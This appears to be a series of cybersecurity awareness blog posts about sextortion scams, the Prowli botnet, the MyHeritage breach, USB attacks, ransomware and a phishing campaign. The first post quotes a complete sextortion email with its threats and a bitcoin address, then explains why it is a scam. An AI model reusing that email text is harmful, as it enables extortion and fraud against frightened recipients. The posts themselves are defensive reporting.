Ransom Demand Scam Tricks Users by Using Real Passwords in Emails

Have you heard about the new ransom demand sextortion scam? Cybercriminals have implemented a new method of false blackmail to scare users into paying bitcoin.

The email reads:

I’m aware that X is your password.

You don’t know me and you’re thinking why you received this email, right?

Well, I actually placed a malware on the porn website and guess what, you visited this website to have fun (you know what I mean). While you were watching the video, your web browser acted as an RDP (Remote Desktop) and a keylogger which provided me access to your display screen and webcam. Right after that, my software gathered all your contacts from your Messenger,  Facebook account, and email account.

What exactly did I do?

I made a split-screen video. First part recorded the video you were viewing (you’ve got a fine taste haha), and next part recorded your webcam (Yep! It’s you doing nasty things!).

What should you do?

Well, I believe, $1400 will be a fair price to pay so your secrets stay safe with me. You’ll make the payment via Bitcoin to the below address (if you don’t know this, search “how to buy bitcoin” in Google).

BTC Address: 1Dvd7Wb72JBTbAcfTrxSJCZZuf4tsT8V72

(It is cAsE sensitive, so copy and paste it)

Important:

You have 24 hours in order to make the payment. (I have a unique pixel within this email message, and right now I know that you have read this email). If I don’t get the payment, I will send your video to all of your contacts including relatives, co-workers, and so forth. Nonetheless, if I do get paid, I will erase the video immediately. If you want evidence, reply with “Yes!” and I will send your video recording to your 5 friends. This is a non-negotiable offer, so don’t waste my time and yours by replying to this email.

To be clear, there is a slim chance that anyone has recorded a video of you, therefore making this email a scam. With that said, hackers are able to make emails such as this so convincing nowadays by implementing new strategies like using your real password (most probably accessed through corporate data breaches within the last few years).

This has really changed the cyber-blackmailing game, but luckily hackers don’t have access to current passwords.

“[A]ll three recipients said the password was close to ten years old, and that none of the passwords cited in the sextortion email they received had been used anytime on their current computers,” explained researcher Brian Krebs, thereby making the stolen passwords old and outdated.

While sextortion scams like this have endeavored for a considerable length of time, there are no reports of any cybercriminals utilizing this strategy and really introducing malware to film somebody pleasuring themselves while watching porn. It’s substantially less demanding to simply lie about it and persuade individuals that it’s true.

To be safe from hackers, you can cover your webcam when not in use and change your passwords regularly to prevent any cybercriminals from accessing your login credentials. To be on the safe side, you can also set up two-factor authorization and secure logins.

To read more about this click here.

Prowli Malware Targeting Servers, Routers, and IoT Devices

After the discovery of the VPNFilter malware, security analysts have revealed another monster botnet that has damaged 40,000 servers from over 9,000 businesses in many domains, including finance, education, and government organizations. This malware–called “Prowli”–has been spreading malware and infusing harmful codes to take over servers and websites around the world, using attack techniques like the exploits that have been excessively abusing weak configurations.

Here’s the list of devices and services infected by the Prowli malware:

  • Drupal and WordPress CMS servers hosting popular websites
  • Joomla! servers running the K2 extension
  • Backup servers running HP Data Protector software
  • DSL modems
  • Servers with an open SSH port
  • PhpMyAdmin installations
  • NFS boxes
  • Servers with exposed SMB ports
  • Vulnerable Internet-of-Thing (IoT) devices

As HackerNews explains in their recent article, “the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, [and] researchers believe they are more focused on making money rather than ideology or espionage.”

According to GuardiCore researchers, Here is how the worm runs commands on remote victims and then reports credentials to a C2 server:

In simplistic terms, the researcher explains:

“r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim…”

Attackers Also Trick Users Into Installing Malicious Extensions

Other then the cryptocurrency miner, attackers are also using a well known open source web-shell called “WSO Web Shell” to modify the compromised servers. Eventually, they trap the visitors of the website into directing them to fake malicious browser extensions. Moreover, researchers have found that the Prowli campaign is related to various industries mentioning how “[o]ver a period of 3 weeks, [they have] captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations.”

How to Protect Your Devices From Prowli-like Malware Attacks

Since there is a mix of known vulnerabilities and credential guesses to compromise devices attackers are using, users should always make sure their systems are patched and up to date and always use strong passwords to avoid the possibility of getting hacked.

In particular, users should also consider securing the frameworks and segmenting vulnerable or hard-to-secure systems in order to separate them from the rest of their network.

 

Data Breach within MyHeritage Announced — 92M User Emails and Passwords Exposed

It’s one piece of news you never want to see or hear–the fact that your personal account has been compromised through a data breach within a website you trusted to keep your information secure. We’ve seen it happen multiple times through companies such as Yahoo and Equifax, and recently, MyHeritage–a family tree and genetic history website–has also joined the data-breach train, where 92 million users have been affected through email and password compromisation.

As explained through one of MyHeritage’s blog posts, a security researcher had discovered a file from “a private server” titled “myheritage” that contained millions of account emails and hashed passwords–passwords that have been one-way encrypted to keep sensitive data stored safely. While hashed passwords are somewhat protected from being “reversed” into attaining the original password (as it does take extensive computing knowledge to do so), MyHeritage has advised all its users to create new passwords regardless.

In times like these, it is always a great idea to utilize an original password unique to MyHeritage, rather than updating the password to one that is already used in other accounts for another website. Hackers can always try to cross-reference the list of emails attained through this breach with the list of emails attained through previous breaches to access other sensitive information you own. Having a unique password for each website can halt such access.

As MyHeritage explains in their post:

Credit card information is not stored on MyHeritage to begin with, but only on trusted third-party billing providers (e.g. BlueSnap, PayPal) utilized by MyHeritage. Other types of sensitive data such as family trees and DNA data are stored by MyHeritage on segregated systems, separate from those that store the email addresses, and they include added layers of security. We have no reason to believe those systems have been compromised.

Keeping this statement in mind, we can rest assured the company has looked into other aspects of the data breach to make certain other information was not compromised. The company has further explained within their blog statement how two-factor authentication will be implemented soon, as they are now “expediting” the process. This authentication will allow users to include a mobile number along with their password to login to MyHeritage, further helping safeguard their accounts from unlawful access.

For now, MyHeritage has provided a 24/7 security customer support team to answer any or all questions for users who have concerns regarding the data breach.

For more information, click here.

Don’t Plug in USBs That You Don’t Own – Ever

A word of advice: don’t trust USBs that you don’t know. Generally speaking, don’t just openly trust technology.

By now, you’ve heard that you should never plug in a USB Flash Drive that you don’t own. If you’ve been following along on our blog, you may have seen our post about it last year.

By 2018, the USB game has evolved. We used to just worry about computers, but now we have to be concerned about our smartphones, too. A new research study from Ben-Gurion University of the Negev in Israel has exposed 29 types of USB attacks. These attacks can be carried out by a variety of methods including plugging into a public USB port or using a USB charger.

Tech Republic spoke with one of the researchers, Ran Yahalom, about the study.

Yahalom said, “We surveyed 29 attacks, updated last year. New methods of likely developed and published attacks increase that number. The microcontroller, a reprogrammable microcontroller used to impersonate peripherals as well as an actually the firmware update. Academic circles call this ‘bad USB.’ It’s a family of attacks based on reprogramming the firmware.”

He went on to add, “If you go into a coffee shop and use charger there, or an airport or a train tstation, any charger that is not your own, you don’t know what that piece of hardware really does,” Yahalom emphasized. “It may not be a charger, but a microcontroller hidden inside a charger casing. It could be something else. You don’t know. Once put into your phone, anything could happen.

I demonstrated how to connect a keyboard to a phone. But it doesn’t look like a keyboard, it looks like a charger, but it’s actually a microcontroller I reprogrammed. I programmed it to act as a keyboard, so it impersonates a keyboard and it looks like a charger. It’s connected to the socket, but without an electrical part of that charger, it’s just a microcontroller. I showed how to connect it to and lock the phone, a sort of ‘ransomware.'”

Yahalom made a fabulous point that illustrated how we should truly view technology.

“The general rule of thumb is: treat technology as something you don’t naturally trust. As users, we have a tendency to trust technology, to trust peripherals, i.e., you trust your flash drive, you trust your keyboard, but you trust it because you’re not aware. Treat it as a syringe: You wouldn’t find a syringe in the parking lot, pick it up, and inject it to yourself. Because you’re aware you could be infected. You have no knowledge of what could happen, but are afraid because it could be dangerous. This is exactly the same thing.”

Keep a few things in mind…

Bring your own charger.

Use your own hardware.

Don’t trust Wi-Fi networks.

Don’t trust technology.

To read more about these 29 USB attacks, this article on Bleeping Computer will get you up-to-speed.

Be sure to subscribe to our newsletter to stay up-to-date on any technology news.

2018 Winter Olympics “Olympic Destroyer” Malware

olympic_destroyer
Picture of the Olympic Rings on the Montreal International Olympic Committee (IOC) building (Canada), built for the 1976 Summer Olympic Games

During the Winter Olympics opening ceremony last week, there was a strange failing of WiFI and television systems for on-site journalists that were covering the event. On Sunday, officials from the Olympics reported that the failures weren’t simply an accident – they were the result of a targeted cyberattack against the international events.

Unfortunately, this isn’t the only cyberattack that the 2018 Winter Olympics have been targeted with. The attacks came after the banning of certain Russian athletes from the games. A Russian hacking group, Fancy Bears, claimed responsibility for the various attacks on the U.S. and International Olympic Committees in result of the ban.

After the attack, Cisco Talos looked into the Olympic Destroyer malware and determined that the malware was capable of interfering with a Windows computer’s data recovery processes. Also, it had the capabilities of deleting critical services.

The researchers stated, “The samples identified, however, are not from adversaries looking for information from the games, but instead they are aimed to disrupt the games. The samples analyzed appear to perform only destructive functionality.”

Another major issue was the fact that the files on network shares were also gone. Additionally, the malware uses a self-patching feature that allows it change after moving from one host system to the next. Lastly, it was discovered that it was using the EternalRomance exploit, which is an NSA exploit leaked by Shadow Brokers in 2017 – also used to spread NotPetya ransomware last year (alongside EternalBlue).

As of now, that’s the latest information we’ve seen. We’ll update this if there is more information.

 

31 Days of Cybersecurity in October

It’s almost October meaning it’s time for pumpkin spice everything, Halloween preparations, and Cybersecurity Awareness Month! The month of October is designated to educate the public about the importance of cybersecurity.

For 31 days straight, we will be posting a tip a day on our Facebook page, so be sure to “like” us so you don’t miss out!

According to the Department of Homeland Security, the monthly awareness program was  “designed to engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the Nation in the event of a cyber incident.”

With the direction technology is headed, it’s no secret that cybersecurity is at the top of the concern list for people all over the world. Global Cyberattacks, data breaches, and ransomware attacks have dominated the headlines recently, exposing citizens to an insurmountable amount of cyber problems. While these problems are in fact very real, we believe that a true weapon against cyber-destruction is knowledge.

In some cases, there is a breakout of a phenomenon known as “security fatigue.”

Is security fatigue real?

With the increasing number of cyber problems accumulating on a daily basis, it seems that individuals have been developing a phenomenon known as “security fatigue,” or risky computing behavior in response to too many instructions and ads against such attacks.

Constantly changing passwords, two factor authentication, captcha, and strong passwords are said to potentially add too much of a burden on employees. For those advanced companies, you might start seeing a move towards biometrics rather than counting on ever-changing passwords to act as your security wall.

For those of us who do not have access to biometrics and fingerprint authentication, we’re going to bring an innovative spin to tried-and-true methods all of us should be putting into practice.

Be sure to follow along on our Facebook page for daily tips that are quick to implement and easy to share. Be sure to let us know if you try them out! #Inverselogic #October #CybersecurityAwarenessMonth

New Ransomware Strain Demands Nudes, Not Bitcoin

Normally, when you see the popular kids cartoon character, Thomas the Train, you don’t think anything of it. But if you see Thomas the Train show up on your computer, it might not be such a pleasant sight. As if extorting money and encrypting files wasn’t bad enough, cybercriminals have taken it to the next level: demanding naked photographs instead of Bitcoin. The new ransomware called nRansomware was first spotted by researchers at MalwareHunterTeam on Thursday.

 

The message reads that the computer has been locked and demands the victim to send “at least 10 nude pictures of you,” claiming that they will verify if they indeed belong to them. They also mention that those nude photographs will be sold on the Dark Web.

MalwareHunterTeam warns that it may simply be a prank since it doesn’t actually encrypt files; it’s simply a screenlocker. There is no information on anyone being infected as of yet.

If this is a real strain of ransomware, it’s a very sick, twisted type of attack. While it’s not entirely unexpected because of hacking or malware to access the webcam, it’s definitely reached a new low.

The Answer to Automotive Cybersecurity: Symbiote Automotive Defense

Did you think only your laptop and computer can be hacked? Well, think again. A few years ago, the only security worries for most car owners were people hot-wiring the ignition or breaking windows. Nowadays, with GPS systems, cameras, automatic brakes, Bluetooth, and even computers built-in to vehicles, drivers now have cyber threats to worry about.

Like most connected items, we forget how susceptible they are to security issues.

Over the past few years, there has been a steady increase of car-hacking studies. In 2016, FBI and the US National Highway Traffic Safety Administration even noted that connected cars are becoming “increasingly vulnerable” to cyberattacks.

At the Defcon Security Conference in 2015, hackers showed off how they were able to breach a Tesla Model S: they unlocked the doors, started the car and drove it away – all without even touching the steering wheel!

In 2016, hackers in Houston showed how easy it was to hack into a car via a laptop.

Red Balloon Security is a cybersecurity company that plays a major role in automotive cyber defense. On Wednesday at the Escar USA Conference (The World’s Leading Automotive Cyber Security Conference) in Detroit, Red Balloon announced their newest product – Symbiote for Automotive Defense.

PROJECT SYMBIOTE: The First Universal Embedded Defense for all embedded devices.

Symbiote already exists for connected devices (think smart fridges and connected coffee makers) and works as a cybersecurity add-on that defends against malware since it’s installed in the embedded device. It is now available for cars of all makes and models.

The CEO of Red Balloon Security, Ang Cui, said in a statement, “As cars become more advanced in the years ahead, and this technology is more widely deployed across all vehicle models, drivers will face a growing set of risks from remote attacks.”

And if you suspected ransomware to be targeted towards cars, you’re probably right. Symbiote automotive defense should protect against from car hijacking and zero-day attacks.

“We fully expect Symbiote for Automotive Defense to become ubiquitous in new automobiles,” Cui said, “First, millions, then hundreds of millions of vehicles.”

 

NHS, FedEx and Other Major Companies Hit in Global Cyberattack

More than 74 countries and 45,000 attacks were carried out during a global cyberattack today. Among the countries affected, 16 National Health Services (NHS) hospitals in England were hit, along with FedEx and Spain’s largest telecom.

The attack appears to be carried out by hackers using a stolen tool created by the United States National Security Agency (NSA): WannaCry Ransomware.

With this strain of ransomware, $300 (£233) is being demanded in exchange for the decryption key for each locked system. Hospitals were forced to shut down their emergency rooms and send patients to other locations. Patient records, schedules, phones and email were all compromised during the attack, putting a number of patients at grave risk.

As of now, it is not being seen as a matter of national security brought on by foreign power. It is still being treated as a very serious matter.

For more information, please visit reevert.com to read the full article.

Locked PDF Phishing Scam Attack

Last week, the SANS Internet Storm Center alerted people about an active phishing campaign that contains malicious PDF attachments. This PDF phishing scam is specifically aiming to steal email credentials.

In the subject line of the email, it reads, “Assessment document,” and a single PDF attachment in the body of the email. The message reads: PDF Secure File UNLOCK to Access File Content.”

pdf_phishing.png

Photo courtesy of KnowBe4.com

You are then prompted to enter your email and email password to “view” the document. This is the type of phishing campaign that targets everyone, not just the more sophisticated users. Founder & CEO of KnowBe4, Stu Sjouwerman, says, “This is a large spray-and-pray campaign that hopes to get a small foothold into your org via an email account and then compromise, tunnel in or send spear-phishing attacks.”

Once opened (using any email / password variation), the PDF suggests that it is a SWIFT banking transaction and transmits any entered data to the spammer.

SANS says, “Be wary of emails from domains that don’t match the contents, note that encrypted PDF documents are not locked this way (and will never ask you for your actual email password anyway), and look for other inconsistencies that give these away as scams.”

If you’ve got Adobe Reader, it will warn you upon opening it. However, if you’re running on Windows 10, be extra weary. The default browser is Edge, which does not appear to give any warnings upon receiving the email.

Be sure to think extra hard before you click so that you don’t become victim to any PDF phishing scam or malicious attempts.